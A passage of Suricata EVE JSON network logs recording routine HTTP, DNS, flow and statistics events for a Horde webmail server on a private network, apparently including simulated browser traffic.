Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3981},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":0}} {"timestamp":"2020-02-29T00:06:53.530561+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36766,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:53.639563+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45988,"proto":"UDP","dns":{"type":"answer","id":36766,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:53.639563+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45988,"proto":"UDP","dns":{"type":"answer","id":36766,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:06:54.152239+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":19005}} {"timestamp":"2020-02-29T00:06:56.895861+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36544,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3163,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:57.004740+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36544,"proto":"UDP","dns":{"type":"answer","id":3163,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:57.004740+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36544,"proto":"UDP","dns":{"type":"answer","id":3163,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:57.151550+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131}} {"timestamp":"2020-02-29T00:06:59.002238+0000","flow_id":2074880077357107,"event_type":"flow","src_ip":"192.168.10.122","src_port":56903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:58.221235+0000","end":"2020-02-29T00:01:58.332439+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:59.155554+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":19005},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} 
{"timestamp":"2020-02-29T00:07:00.000186+0000","event_type":"stats","stats":{"uptime":14072,"capture":{"kernel_packets":133702,"kernel_drops":0},"decoder":{"pkts":133714,"bytes":92495080,"invalid":181,"ipv4":132257,"ipv6":8,"ethernet":133714,"raw":0,"null":0,"sll":0,"tcp":127141,"udp":4920,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2711,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2727,"synack":2718,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1754,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2244,"failed_udp":110},"tx":{"http":4541,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2321}},"flow_mgr":{"closed_pruned":2693,"new_pruned":15,"est_pruned":2288,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21165,"memcap_state":0,"memcap_global":0},"http":{"memuse":188825,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:00.231216+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30702,"tx_id":0}} {"timestamp":"2020-02-29T00:07:00.242351+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55353,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12284,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:00.351112+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55353,"proto":"UDP","dns":{"type":"answer","id":12284,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:00.351112+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55353,"proto":"UDP","dns":{"type":"answer","id":12284,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:00.421380+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383}} {"timestamp":"2020-02-29T00:07:00.708831+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35100,"tx_id":1}} {"timestamp":"2020-02-29T00:07:00.719517+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40239,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6681,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:00.828093+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40239,"proto":"UDP","dns":{"type":"answer","id":6681,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:00.828093+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40239,"proto":"UDP","dns":{"type":"answer","id":6681,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:07:00.886477+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:07:00.886498+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":905}} {"timestamp":"2020-02-29T00:07:02.000817+0000","flow_id":1373619292299151,"event_type":"flow","src_ip":"192.168.10.122","src_port":34201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:01.614287+0000","end":"2020-02-29T00:02:01.726419+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:02.000980+0000","flow_id":1385872834029786,"event_type":"flow","src_ip":"192.168.10.122","src_port":41614,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:01.583898+0000","end":"2020-02-29T00:02:01.695422+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:03.000661+0000","flow_id":1224077136164186,"event_type":"flow","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":13,"bytes_toserver":2729,"bytes_toclient":7411,"start":"2020-02-29T00:05:52.587098+0000","end":"2020-02-29T00:06:02.061403+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:03.001362+0000","flow_id":2245411754145674,"event_type":"flow","src_ip":"192.168.10.122","src_port":56001,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:02.063370+0000","end":"2020-02-29T00:02:02.174799+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:05.000870+0000","flow_id":1667395055547594,"event_type":"flow","src_ip":"192.168.10.122","src_port":59842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:04.750794+0000","end":"2020-02-29T00:02:04.861699+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:05.888042+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":905},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2334,"tx_id":2}} {"timestamp":"2020-02-29T00:07:06.000423+0000","flow_id":69813250355827,"event_type":"flow","src_ip":"192.168.10.122","src_port":45990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:04.979571+0000","end":"2020-02-29T00:02:05.090880+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:07.000175+0000","event_type":"stats","stats":{"uptime":14079,"capture":{"kernel_packets":133719,"kernel_drops":0},"decoder":{"pkts":133739,"bytes":92508417,"invalid":181,"ipv4":132282,"ipv6":8,"ethernet":133739,"raw":0,"null":0,"sll":0,"tcp":127162,"udp":4924,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2711,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2727,"synack":2718,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1754,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2246,"failed_udp":110},"tx":{"http":4543,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2323}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2292,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20174,"memcap_state":0,"memcap_global":0},"http":{"memuse":137002,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:08.048471+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48718,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61304,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:08.157035+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48718,"proto":"UDP","dns":{"type":"answer","id":61304,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:08.157035+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48718,"proto":"UDP","dns":{"type":"answer","id":61304,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:08.234197+0000","flow_id":322507671114127,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/add.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","length":20}} {"timestamp":"2020-02-29T00:07:08.241765+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49564,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35492,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:07:08.350330+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49564,"proto":"UDP","dns":{"type":"answer","id":35492,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:08.350330+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49564,"proto":"UDP","dns":{"type":"answer","id":35492,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:11.433029+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57163,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20847,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:11.541143+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57163,"proto":"UDP","dns":{"type":"answer","id":20847,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:11.541143+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57163,"proto":"UDP","dns":{"type":"answer","id":20847,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:11.614596+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360}} {"timestamp":"2020-02-29T00:07:11.614596+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:07:13.001742+0000","flow_id":1646985371396187,"event_type":"flow","src_ip":"192.168.10.122","src_port":52256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:11.927835+0000","end":"2020-02-29T00:02:12.039358+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:14.000393+0000","event_type":"stats","stats":{"uptime":14086,"capture":{"kernel_packets":133750,"kernel_drops":0},"decoder":{"pkts":133793,"bytes":92539822,"invalid":183,"ipv4":132336,"ipv6":8,"ethernet":133793,"raw":0,"null":0,"sll":0,"tcp":127208,"udp":4930,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2713,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2729,"synack":2720,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1756,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2249,"failed_udp":110},"tx":{"http":4545,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2326}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2294,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20837,"memcap_state":0,"memcap_global":0},"http":{"memuse":41230,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:16.000296+0000","flow_id":1288304062889383,"event_type":"flow","src_ip":"192.168.10.122","src_port":41386,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:15.196007+0000","end":"2020-02-29T00:02:15.307685+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:16.615624+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":613,"tx_id":0}} {"timestamp":"2020-02-29T00:07:20.223330+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58451,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35085,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:20.332082+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58451,"proto":"UDP","dns":{"type":"answer","id":35085,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:07:20.332082+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58451,"proto":"UDP","dns":{"type":"answer","id":35085,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:20.401062+0000","flow_id":1214181537235511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5750}} {"timestamp":"2020-02-29T00:07:21.000157+0000","event_type":"stats","stats":{"uptime":14093,"capture":{"kernel_packets":133797,"kernel_drops":0},"decoder":{"pkts":133800,"bytes":92540236,"invalid":183,"ipv4":132341,"ipv6":8,"ethernet":133800,"raw":0,"null":0,"sll":0,"tcp":127213,"udp":4930,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2713,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2729,"synack":2720,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_me